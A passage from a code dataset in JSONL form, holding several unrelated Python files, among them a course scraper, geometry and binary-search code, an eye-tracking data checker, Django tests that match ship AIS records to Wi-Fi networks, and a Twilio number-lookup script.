== 'Department':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Department found.')\r\n\r\n def find_instructor(self,page_html):\r\n \"\"\"Helper method used to extract instructor from course webpage\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing instructor name (format: 'Last_Name,First_Int')\r\n or 'N/A' if the course has no instructor\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Instructor':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n return ('N/A')\r\n\r\n def find_time(self,page_html):\r\n \"\"\"Helper method used to convert string with time info to list of time objects\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns:\r\n List of DayTime objects, each DayTime object containing information\r\n on the day of the week and the time at which the course meets\r\n \"\"\"\r\n dt_string = self.find_dt_string(page_html)\r\n\r\n dt_list = []\r\n dt_unique = dt_string.split(',')\r\n for dt in dt_unique:\r\n dt = dt.split()\r\n try:\r\n day_list = dt[0]\r\n time = dt[1]\r\n except IndexError: # Raised when the time is an empty string\r\n continue\r\n for indx in range(len(day_list)):\r\n if day_list[indx] == 'M' or day_list[indx] == 'W' or day_list[indx] == 'F':\r\n dt_list.append(DayTime(day_list[indx],time))\r\n elif day_list[indx] == 'T':\r\n if indx == len(day_list) - 1:\r\n dt_list.append(DayTime(day_list[indx],time))\r\n elif day_list[indx + 1] == 'H':\r\n dt_list.append(DayTime(day_list[indx:indx+2],time))\r\n else:\r\n dt_list.append(DayTime(day_list[indx],time))\r\n\r\n return dt_list\r\n\r\n def find_dt_string(self,page_html):\r\n \"\"\"Helper method used to extract string containing time info from course page\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns:\r\n String containing time information on the course page (e.g. 'MWF 9:30am-10:20am')\r\n\r\n Raises:\r\n ValueError, if no time info in found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Time And Days':\r\n return field.td.next_sibling.text\r\n field = field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Time/Day found.')\r\n\r\n def find_room(self,page_html):\r\n \"\"\" Helper method used to extract room info from course page\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing room information (e.g. 'Science Center 101')\r\n\r\n Raises:\r\n ValueError, if no room info is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Room Location':\r\n return field.td.next_sibling.text\r\n field = field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Room Location found.')\r\n\r\n def send_to_sqlite(self,cursor):\r\n \"\"\" Method to store the Course attributes in SQLite database\r\n\r\n Args:\r\n cursor: sqlite3 Cursor object\r\n\r\n Raises:\r\n TypeError, if cursor is not an sqlite3 Cursor object\r\n \"\"\"\r\n if type(cursor) is not sqlite3.Cursor:\r\n raise TypeError('Must specify sqlite3 cursor')\r\n else:\r\n cursor.execute(\"\"\"\r\n INSERT INTO course(regid,title,room,instructor,department)\r\n VALUES(?,?,?,?,?)\"\"\", (self.regid,self.course_title,self.room,\r\n self.instructor,self.dept)\r\n )\r\n\r\n for time in self.time:\r\n day = time.day\r\n start_time = time.start.strftime('%H:%M')\r\n end_time = time.end.strftime('%H:%M')\r\n \r\n cursor.execute(\"\"\"\r\n INSERT OR IGNORE INTO day_time(day,start_time,end_time)\r\n VALUES(?,?,?)\"\"\", (day,start_time,end_time)\r\n )\r\n\r\n cursor.execute(\"\"\"\r\n INSERT OR IGNORE INTO course_times(regid,day,start_time,end_time)\r\n VALUES(?,?,?,?)\"\"\", (self.regid,day,start_time,end_time)\r\n )","sub_path":"course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":9187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353932524","text":"import generic as g\n\n\nclass SectionTest(g.unittest.TestCase):\n\n def setUp(self):\n self.mesh = g.get_mesh('featuretype.STL')\n\n def test_section(self):\n # this hits every case of section due to the geometry of this model\n step = .125\n z_levels = g.np.arange(start=self.mesh.bounds[0][2],\n stop=self.mesh.bounds[1][2] + 2 * step,\n step=step)\n\n for z in z_levels:\n plane_origin = [0, 0, z]\n plane_normal = [0, 0, 1]\n\n\n section = self.mesh.section(plane_origin=plane_origin,\n plane_normal=plane_normal)\n if section is None:\n # section will return None if the plane doesn't\n # intersect the mesh\n assert z > (self.mesh.bounds[1][\n 2] - g.trimesh.constants.tol.merge)\n continue\n\n assert len(section.entities) == len(section.metadata['face_index'])\n planar, to_3D = section.to_planar()\n assert planar.is_closed\n assert (len(planar.polygons_full) > 0)\n \nclass PlaneLine(g.unittest.TestCase):\n\n def test_planes(self):\n count = 10\n z = g.np.linspace(-1, 1, count)\n\n plane_origins = g.np.column_stack((g.np.random.random((count, 2)), z))\n plane_normals = g.np.tile([0, 0, -1], (count, 1))\n\n line_origins = g.np.tile([0, 0, 0], (count, 1))\n line_directions = g.np.random.random((count, 3))\n\n i, valid = g.trimesh.intersections.planes_lines(plane_origins=plane_origins,\n plane_normals=plane_normals,\n line_origins=line_origins,\n line_directions=line_directions)\n self.assertTrue(valid.all())\n self.assertTrue((g.np.abs(i[:, 2] - z) < g.tol.merge).all())\n\n\nif __name__ == '__main__':\n g.trimesh.util.attach_to_log()\n g.unittest.main()\n","sub_path":"tests/test_section.py","file_name":"test_section.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353843509","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date : 2019-09-09\n# Author : Yuanbo Zhao (chaojunction@gmail.com)\n\n# https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/\n# Find First and Last Position of Element in Sorted Array\n\n# returns leftmost (or rightmost) index at which `target` should be inserted in sorted\n# array `nums` via binary search.\ndef extreme_insertion_index(nums: list([int]), target: int, left: bool) -> int:\n lo = 0\n hi = len(nums)\n while lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] > target or (left and target == nums[mid]):\n hi = mid\n else:\n lo = mid + 1\n\n return lo\n\n\ndef searchRange(nums: list([int]), target: int) -> list([int]):\n left_idx = extreme_insertion_index(nums, target, True)\n\n # assert that `left_idx` is within the array bounds and that `target`\n # is actually in `nums`.\n if left_idx == len(nums) or nums[left_idx] != target:\n return [-1, -1]\n\n return [left_idx, extreme_insertion_index(nums, target, False) - 1]\n\n\nif __name__ == '__main__':\n nums = [5,5,5,5,5,5]\n print(searchRange(nums, 5))\n\n nums = [5,7,7,8,8,10]\n print(searchRange(nums, 8))\n print(searchRange(nums, 6))\n","sub_path":"Array/二分查找索引.py","file_name":"二分查找索引.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"541705760","text":"\n# coding: utf-8\n\n# ## Library\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib as mpl\n\n\n# *** Validation criterias: ***\n# \n# - We have 18 TRIAL_INDEX\n# \n# - CURRENT_FIX_X and CURRENT_FIX_Y are positives and in the 1920x1080 screen\n# \n# - CURRENT_FIX_START is positive\n# \n# - EYE_USED is always equal to RIGHT\n# \n# - CURRENT_FIX_DURATION is positive\n# \n# - We have 18 WEBSITE_ID\n# \n# - We have 6 x 3 CONDITION \n\n# *** Import Data ***\n\n# In[ ]:\n\n\nrootPath = '../data/'\npartID = 710\n\n\n# In[ ]:\n\n\n# CSV Eye-tracker\ndata = pd.read_csv(\"{0}/part_{1}/part_{1}_clean.csv\".format(rootPath, partID), sep=\",\")\n# CFG Mouse-tracker\nconfig = pickle.load(open(\"{0}/part_{1}/part_{1}.cfg\".format(rootPath, partID), 'rb'))\n\n\n# *** Modification type of features ***\n\n# In[ ]:\n\n\n#data[\"CURRENT_FIX_Y\"] = pd.to_numeric(data[\"CURRENT_FIX_Y\"].str.replace(',','.'))\n#data[\"CURRENT_FIX_X\"] = pd.to_numeric(data[\"CURRENT_FIX_X\"].str.replace(',','.'))\n#data[\"NEXT_SAC_AMPLITUDE\"] = pd.to_numeric(data[\"NEXT_SAC_AMPLITUDE\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_END_X\"] = pd.to_numeric(data[\"NEXT_SAC_END_X\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_END_Y\"] = pd.to_numeric(data[\"NEXT_SAC_END_Y\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_DURATION\"] = pd.to_numeric(data[\"NEXT_SAC_DURATION\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_ANGLE\"] = pd.to_numeric(data[\"NEXT_SAC_ANGLE\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_AVG_VELOCITY\"] = pd.to_numeric(data[\"NEXT_SAC_AVG_VELOCITY\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n\n\n# In[ ]:\n\n\ndata.dtypes\n\n\n# In[ ]:\n\n\ndata.head()\n\n\n# ## Criterias\n\n# In[ ]:\n\n\na_matrix = np.array([0, 0, 0, 0, 0, 0, 0, 0])\na_matrix\n\n\n# In[ ]:\n\n\ncustom_colors = mpl.colors.LinearSegmentedColormap.from_list(\"\", [\"red\",\"orange\",\"green\"])\n\nplt.matshow([a_matrix], cmap=custom_colors, vmin = 0, vmax = 2)\nplt.show()\n\n\n# *** 18 TRIAL_INDEX ***\n\n# In[ ]:\n\n\n# Sort by TRIAL_INDEX\ndata_sorted = data.TRIAL_INDEX.unique()\ndata_sorted.sort()\n\n\n# In[ ]:\n\n\ngood_trialsID = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\nif ((data_sorted == good_trialsID).all()) :\n a_matrix[0] = 2\n\n\n# *** CURRENT_FIX_X and CURRENT_FIX_Y are positives and in the 1920x1080 screen ***\n\n# In[ ]:\n\n\nfixX_prop_inscreen = round(len(data.query(\"CURRENT_FIX_X >= 0 and CURRENT_FIX_X <= 1920\"))/len(data),2)\nfixY_prop_inscreen = round(len(data.query(\"CURRENT_FIX_Y >= 0 and CURRENT_FIX_Y <= 1080\"))/len(data),2)\n\nprint(str(fixX_prop_inscreen*100) + \"% of CURRENT_FIX_X are positives and < 1920 px\")\n\nif (fixX_prop_inscreen == 1):\n a_matrix[1] = 2\nelif (fixX_prop_inscreen > 0.95):\n a_matrix[1] = 1\n \nprint(str(fixY_prop_inscreen*100) + \"% of CURRENT_FIX_Y are positives and < 1080 px\")\n\nif (fixY_prop_inscreen == 1):\n a_matrix[2] = 2\nelif (fixY_prop_inscreen > 0.95):\n a_matrix[2] = 1\n\n\n# In[ ]:\n\n\nfig, axs = plt.subplots(1,2)\n\ndata[\"CURRENT_FIX_X\"].hist(ax=axs[0])\ndata[\"CURRENT_FIX_Y\"].hist(ax=axs[1])\n\n\n# *** CURRENT_FIX_START is positive ***\n\n# In[ ]:\n\n\nfixStart_prop = round(len(data.query(\"CURRENT_FIX_START >= 0\"))/len(data),3) \n\nprint(str(fixStart_prop *100) + \"% of CURRENT_FIX_START are positive\")\nif (fixStart_prop == 1):\n a_matrix[3] = 2\nelif (fixStart_prop > 0.95):\n a_matrix[3] = 1\n\n\n# *** EYE_USED is always equal to RIGHT ***\n\n# In[ ]:\n\n\neye_prop = round(len(data.query(\"EYE_USED == 'RIGHT'\"))/len(data),3)\n\nprint(str(eye_prop*100) + \"% of EYE_USED are right\")\nif (eye_prop == 1):\n a_matrix[4] = 2\n\n\n# *** CURRENT_FIX_DURATION is positive ***\n\n# In[ ]:\n\n\nfixDuration_prop = round(len(data.query(\"CURRENT_FIX_DURATION > 0\"))/len(data),3)\n\nprint(str(fixDuration_prop * 100) + \"% of CURRENT_FIX_DURATION are positive\")\nif (fixDuration_prop == 1):\n a_matrix[5] = 2\n\n\n# *** We have 18 WEBSITE_ID ***\n\n# In[ ]:\n\n\ndef get_website_id(trial_num):\n return config[\"rand_weblist\"][trial_num - 1][\"id\"]\n\ndata[\"WEBSITE_ID\"] = data[\"TRIAL_INDEX\"].apply(get_website_id)\n\nweb = data[\"WEBSITE_ID\"].unique()\nweb.sort()\n\n\n# In[ ]:\n\n\ngood_websites = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\nif ((web == good_websites).all()) :\n a_matrix[6] = 2\n\n\n# *** We have 6 x 3 CONDITION ***\n\n# In[ ]:\n\n\ndef get_condition(trial_num):\n data = config[\"rand_weblist\"][trial_num - 1]\n if(data[\"type\"] == \"free\" and data[\"ad_id\"] == 0 and data[\"mpu_id\"] == 0):\n return 1\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] == 0 and data[\"mpu_id\"] == 0):\n return 2\n elif(data[\"type\"] == \"free\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] == 0):\n return 3\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] == 0):\n return 4\n elif(data[\"type\"] == \"free\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] > 0):\n return 5\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] > 0):\n return 6\n \n return None\n\ndata[\"CONDITION\"] = data[\"TRIAL_INDEX\"].apply(get_condition)\ndata.head()\n\n\n# In[ ]:\n\n\ncond = data[\"CONDITION\"].unique()\ncond.sort()\n\n\n# In[ ]:\n\n\ngood_condition = np.array([1,2,3,4,5,6])\nif ((cond == good_condition).all()) :\n a_matrix[7] = 2\n\n\n# ## CHECK\n\n# In[ ]:\n\n\nplt.matshow([a_matrix], cmap=custom_colors, vmin = 0, vmax = 2)\nplt.show()\n\n","sub_path":"Data_checking/git_log/4.5. Check data consistancy (Single).py","file_name":"4.5. Check data consistancy (Single).py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"136784710","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\np= '/home/avishay/Project/RawData/Carte Noire other/58184_187646.png'\nimg = cv2.imread(p)\nsobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\nsobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n\nplt.subplot(3,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,2),plt.imshow(sobelx[:,:,0],'Reds')\nplt.title('dR/dX'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,3),plt.imshow(sobelx[:,:,1],'Greens')\nplt.title('dG/dX'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,4),plt.imshow(sobelx[:,:,2])\nplt.title('dB/dX'), plt.xticks([]), plt.yticks([])\n\nplt.subplot(3,3,5),plt.imshow(sobely[:,:,0],'Reds')\nplt.title('dR/dY'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,6),plt.imshow(sobely[:,:,1],'Greens')\nplt.title('dG/dY'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,7),plt.imshow(sobely[:,:,2])\nplt.title('dB/dY'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n\nplt.imsave('/home/avishay/Project/dB-dY.png',sobely[:,:,2],cmap='Blues')\n","sub_path":"Derivatives.py","file_name":"Derivatives.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"312223439","text":"# Copyright (c) 2015 App Annie Inc. All rights reserved.\n\nINT_AJAX_URLS = [\n {\"url\": \"/ajax/intelligence/metric_picker/update/\",\n \"post_data\": {\n \"page\": \"app_comparator\",\n \"column_config\": {\n \"total_time\": False,\n \"average_mb_per_user\": False,\n \"average_session_duration\": False,\n \"open_rate\": False,\n \"average_session_per_user\": False,\n \"install_penetration\": False,\n \"average_mb_per_session\": False,\n \"average_time_per_user\": False,\n \"average_active_days\": False,\n \"percentage_active_days\": False,\n \"share_of_category_time\": False}}},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/unified_apps/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/saved_search/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/default_apps/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/table_data.json/\",\n \"post_data\": {\n \"platform\": \"all\",\n \"countries\": \"10\",\n \"granularity\": \"weekly\",\n \"data_source\": \"sampled\",\n \"app_type\": \"app\",\n \"apps\": [{\"id\": 978866413, \"market\": \"ios\"}],\n \"start_date\": \"2015-06-21\",\n \"end_date\": \"2015-12-25\"}},\n {\"url\": \"/ajax/intelligence/apps/comparator/chart_data.json/\",\n \"post_data\": {\n \"chart_type\": \"downloads\",\n \"platform\": \"all\",\n \"countries\": \"10\",\n \"granularity\": \"weekly\",\n \"data_source\": \"sampled\",\n \"apps\": [{\"id\": 978866413, \"market\": \"ios\"}],\n \"app_type\": \"app\",\n \"start_date\": \"2015-06-28\",\n \"end_date\": \"2015-12-27\"}},\n]\n","sub_path":"tests/qa/constants/ajax_urls.py","file_name":"ajax_urls.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"387915461","text":"import csv\n\nfrom aisdecoder import commands as ais_commands\nfrom analysis import commands as analysis_commands\nfrom analysis.services import PointOfInterestService\nfrom networkparser import commands as network_commands\n\nimport os\nfrom django.conf import settings\nfrom django.test import TestCase\n\n\nclass GetAISDocumentCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GetAISDocumentCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n ais_doc_id = self.ais_doc.id\n found_ais_doc = analysis_commands.GetAISDocumentCommand(ais_doc_id).execute()\n\n self.assertEquals(found_ais_doc.docfile, self.good_ais_file)\n self.assertEquals(found_ais_doc, self.ais_doc)\n\n\nclass GetNetworkDocumentCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GetNetworkDocumentCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n network_doc_id = self.network_doc.id\n found_network_doc = analysis_commands.GetNetworkDocumentCommand(network_doc_id).execute()\n\n self.assertEquals(found_network_doc.docfile, self.good_network_file)\n self.assertEquals(found_network_doc, self.network_doc)\n\n\nclass GooglePlacesAPICommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GooglePlacesAPICommand.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.api_command = analysis_commands.GooglePlacesAPICommand(lat=43.662237,\n lon=-70.274400,\n radius=100,\n keyword='USM')\n\n self.real_result = {\n 'latitude': 43.66218259999999,\n 'longitude': -70.27527979999999,\n 'name': 'University of Southern Maine',\n 'vicinity': '96 Falmouth Street, Portland'}\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n business_dict = self.api_command.execute()\n\n self.assertDictEqual(self.real_result, business_dict)\n\n\nclass GoogleMapsReverseGeoCodingAPICommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GoogleMapsReverseGeoCodingAPICommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.map_command = analysis_commands.GoogleMapsReverseGeoCodingAPICommand(43.6632770000, -70.2761990000)\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n city, state = self.map_command.execute()\n\n self.assertEquals('Portland', city)\n self.assertEquals('Maine', state)\n\n\nclass MatchBusinessesToNetworksCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchBusinessesToNetworksCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n network_commands.ParseCommand(self.network_doc).execute()\n\n self.match_command = analysis_commands.MatchBusinessesToNetworksCommand(self.network_doc)\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = self.match_command.execute()\n\n self.assertEquals(1, len(matches))\n self.assertDictEqual({u'UMS-Guest': {'business_name': 'University of Southern Maine',\n 'business_vicinity': '96 Falmouth Street, Portland'}},\n matches[0])\n\n\nclass MatchShipsToNetworksCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchShipsToNetworksCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n\n self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n nmea_sentences = ais_commands.ProcessFileCommand(self.ais_doc).execute()\n for _ in ais_commands.DecodeCommand(nmea_sentences).execute():\n pass\n\n network_commands.ParseCommand(self.network_doc).execute()\n self.real_matches = \\\n {\n u'CRYSTAL SYMPHONY':\n [\n {'client_mac': u'00:0C:E6:02:F3:33',\n 'signal_strength': u'-79',\n 'frequency': u'2437.0',\n 'essid': u'CU@SYMPHONY',\n 'bssid': u'00:0C:E6:02:F3:33',\n 'latitude': 43.656929,\n 'encryption': u'None',\n 'first_seen_time': u'Wed Oct 21 17:45:19 2015',\n 'last_seen_time': u'Wed Oct 21 19:40:41 2015',\n 'longitude': -70.245186}\n ]\n }\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = analysis_commands.MatchShipsToNetworksCommand(self.ais_doc, self.network_doc).execute()\n self.assertDictEqual(self.real_matches, matches)\n\n\nclass ProcessPointsOfInterestCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the ProcessPointsOfInterestCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.points = [{'latitude': 43.3, 'longitude': -70.1, 'radius': 50},\n {'latitude': 43.5, 'longitude': -70.5, 'radius': 100},\n {'latitude': 43.9, 'longitude': -70.7, 'radius': 10}]\n self.session_id = '1'\n self.analysis_service = PointOfInterestService()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n self.assertGreater(self.analysis_service.count_models(session_id=self.session_id), 0)\n\n\nclass MatchNetworksToPointsOfInterestCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchNetworksToPointsOfInterestCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.points = [{'latitude': 43.655624, 'longitude': -70.252945, 'radius': 100},\n {'latitude': 43.653481, 'longitude': -70.249199, 'radius': 50}]\n self.session_id = '1'\n analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n network_commands.ParseCommand(self.network_doc).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = analysis_commands.MatchNetworksToPointsOfInterestCommand(self.network_doc, self.session_id).execute()\n self.assertGreater(len(matches), 0)\n\n\nclass ExportVicinityCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the ExportVicinityCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.points = [{'latitude': 43.655624, 'longitude': -70.252945, 'radius': 100},\n {'latitude': 43.653481, 'longitude': -70.249199, 'radius': 50}]\n self.session_id = '1'\n analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n network_commands.ParseCommand(self.network_doc).execute()\n\n self.ofile = os.path.join(settings.MEDIA_ROOT, \"testing/vicinity_out.csv\")\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n with open(self.ofile, 'w') as csv_out:\n analysis_commands.ExportVicinityCommand(self.network_doc, csv_out, self.session_id).execute()\n\n with open(self.ofile, 'r') as csv_out:\n reader = csv.reader(csv_out)\n header = next(reader)\n row_1 = next(reader)\n row_2 = next(reader)\n\n self.assertEquals(header, ['ESSID', 'Encryption', 'Network Latitude', 'Network Longitude',\n 'Point of Interest Latitude', 'Point of Interest Longitude',\n 'Point of Interest Radius', 'Distance(m)'])\n self.assertEquals(row_1, ['Unknown', 'Unknown', '43.655624', '-70.252945',\n '43.655624', '-70.252945', '100.0', '0.0'])\n self.assertEquals(row_2, ['Unknown', 'Unknown', '43.653481', '-70.249199', '43.653481',\n '-70.249199', '50.0', '0.0'])\n\n\nclass ExportShipToNetworkMatchesCommand(TestCase):\n \"\"\"\n Unit testing class for the ExportVicinityCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n\n self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n nmea_sentences = ais_commands.ProcessFileCommand(self.ais_doc).execute()\n for _ in ais_commands.DecodeCommand(nmea_sentences).execute():\n pass\n\n network_commands.ParseCommand(self.network_doc).execute()\n\n self.ofile = os.path.join(settings.MEDIA_ROOT, \"testing/ship_network_matches_out.csv\")\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n with open(self.ofile, 'w') as csv_out:\n analysis_commands.ExportShipToNetworkMatchesCommand(self.ais_doc, self.network_doc, csv_out).execute()\n\n with open(self.ofile, 'r') as csv_out:\n reader = csv.reader(csv_out)\n header = next(reader)\n row_1 = next(reader)\n\n self.assertEquals(header, ['Vessel Name', 'ESSID', 'BSSID', 'Encryption'])\n self.assertEquals(row_1, ['CRYSTAL SYMPHONY', 'CU@SYMPHONY', '00:0C:E6:02:F3:33', 'None'])\n","sub_path":"apps/analysis/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":11904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"314723655","text":"# *** Fetch a Lookup ***\n# Code based on https://www.twilio.com/docs/lookup/api\n# Download Python 3 from https://www.python.org/downloads/\n# Download the Twilio helper library from https://www.twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n# from datetime import datetime | not required for this example\nimport logging\n#write requests & responses from Twilio to log file, useful for debugging:\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s',\n filename='/usr/local/twilio/python3/sdkv6x/lookup/logs/twilio_lookup.log',\n filemode='a')\n\n# Your Account Sid and Auth Token from twilio.com/console & stored in Mac OS ~/.bash_profile in this example \naccount_sid = os.environ.get('$TWILIO_ACCOUNT_SID')\nauth_token = os.environ.get('$TWILIO_AUTH_TOKEN')\nclient = Client(account_sid, auth_token)\n\n# A list of lookup parameters & their permissable values, comment out (#) those lines not required\n\nphone_number = client.lookups \\\n .phone_numbers('16502530000') \\\n .fetch(\n add_ons='', # Optional, Add-On Unique Names \n country_code='US', # Optional, ISO Country Code\n type='caller-name' # Optional, or caller-name, default = null, fraud = bet\n )\n\n#print list of all lookup properties to console, useful for learning info available you can work with?\n\nprint(phone_number.add_ons)\nprint(phone_number.caller_name)\nprint(phone_number.carrier)\nprint(phone_number.country_code)\nprint(phone_number.national_format)\nprint(phone_number.phone_number)\nprint(phone_number.url)\n\n#create variable for this lookup\ncdr = (phone_number.phone_number)\n\n#open *.log file with cdr var as filename...\nf = open(\"/usr/local/twilio/python3/sdkv6x/lookup/logs/\" + str( cdr ) + \".log\", \"a\")\n#write list of all lookup properties to above file...\nf.write(\"Add Ons : \" + str(phone_number.add_ons) + \"\\n\")\nf.write(\"Caller Name : \" + str(phone_number.caller_name) + \"\\n\")\nf.write(\"Carrier : \" + str(phone_number.carrier) + \"\\n\")\nf.write(\"Country Code : \" + str(phone_number.country_code) + \"\\n\")\nf.write(\"National Format : \" + 